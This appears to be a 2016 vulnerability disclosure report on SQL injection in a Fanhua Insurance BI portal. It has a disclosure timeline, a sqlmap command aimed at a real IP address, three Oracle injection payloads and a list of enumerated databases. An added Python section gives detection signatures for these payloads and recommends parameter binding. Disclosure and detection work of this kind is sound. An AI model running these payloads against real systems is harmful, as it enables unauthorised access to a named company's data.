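2016-04-18: Details reported to the vendor; awaiting vendor handling
2016-04-20: Vendor confirmed; details disclosed to the vendor only
2016-04-30: Details disclosed to core white hats and experts in related fields
2016-05-10: Details disclosed to regular white hats
2016-05-20: Details disclosed to intern white hats
2016-06-04: Details disclosed to the public
SQL injection vulnerability in a Fanhua Insurance (泛华保险) system
Vulnerable server: http://219.141.188.35/biportal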
python sqlmap.py -u "http://219.141.188.35/biportal/verifyLogin" --data "systemValidType=cognosLogin&userCode=test&actionType=login&userPassword=123456" -p userCode --dbms 'Oracle'
---
Parameter: userCode (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: systemValidType=cognosLogin&userCode=test' AND 9278=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(118)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9278=9278) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'KhpS'='KhpS&actionType=login&userPassword=123456

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: systemValidType=cognosLogin&userCode=test' UNION ALL SELECT NULL,CHR(113)||CHR(113)||CHR(118)||CHR(122)||CHR(113)||CHR(66)||CHR(104)||CHR(108)||CHR(117)||CHR(89)||CHR(69)||CHR(122)||CHR(116)||CHR(66)||CHR(72)||CHR(113)||CHR(106)||CHR(98)||CHR(98)||CHR(113) FROM DUAL-- &actionType=login&userPassword=123456

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: systemValidType=cognosLogin&userCode=test' AND 3861=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'QCVT'='QCVT&actionType=login&userPassword=123456
---
available databases [20]:
[*] BIPORTAL
[*] COGNOS
[*] COGNOS1
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DW
[*] EXFSYS
[*] MDSYS
[*] ODS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Filter the input.
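The three techniques in the sqlmap output above leave recognizable strings in the userCode field, so a defender can flag them in captured POST bodies. The following Python code is an added example, not part of the original report; the function names, signature labels and sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Signatures for the techniques in the sqlmap output above (Oracle dialect).
SIGNATURES = {
    "error-based (XMLType)": re.compile(r"\bXMLType\s*\(", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    # Heavy-query delay: one ALL_* dictionary view cross-joined 3+ times.
    "time-based (heavy query)": re.compile(
        r"\bFROM\s+(ALL_\w+)\s+\w+(?:\s*,\s*\1\s+\w+){2,}", re.I),
    # Marker strings assembled as CHR(n)||CHR(n)||... to avoid quotes.
    "CHR() chain": re.compile(r"(?:CHR\(\d+\)\s*\|\|\s*){3,}", re.I),
}

def classify_field(value):
    """Return the names of every signature found in one decoded field value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def scan_body(body, fields=("userCode",)):
    """Decode a form-encoded POST body and classify the watched fields."""
    params = parse_qs(body, keep_blank_values=True)
    hits = {}
    for field in fields:
        for value in params.get(field, []):
            found = classify_field(value)
            if found:
                hits.setdefault(field, []).extend(found)
    return hits

# Constructed sample bodies: a benign login, shortened forms of the three
# payloads quoted on this page, and a URL-encoded UNION variant.
TAIL = "&actionType=login&userPassword=123456"
SAMPLES = {
    "benign": "systemValidType=cognosLogin&userCode=test" + TAIL,
    "error": "userCode=test' AND 9278=(SELECT UPPER(XMLType(CHR(60)||CHR(58)"
             "||CHR(113)||CHR(62))) FROM DUAL) AND 'KhpS'='KhpS" + TAIL,
    "union": "userCode=test' UNION ALL SELECT NULL,CHR(113)||CHR(113)"
             "||CHR(118)||CHR(122) FROM DUAL-- " + TAIL,
    "time": "userCode=test' AND 3861=(SELECT COUNT(*) FROM ALL_USERS T1,"
            "ALL_USERS T2,ALL_USERS T3) AND 'QCVT'='QCVT" + TAIL,
    "encoded": "userCode=test%27+UNION+ALL+SELECT+NULL%2CCHR%28113%29%7C%7C"
               "CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28122%29+FROM+DUAL" + TAIL,
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, scan_body(body))
```

Signature matching only flags scanner traffic like this; the flaw itself is closed by binding userCode as a query parameter instead of concatenating it into the SQL text.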
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2016-04-20 15:13
Thank you very much!
None yet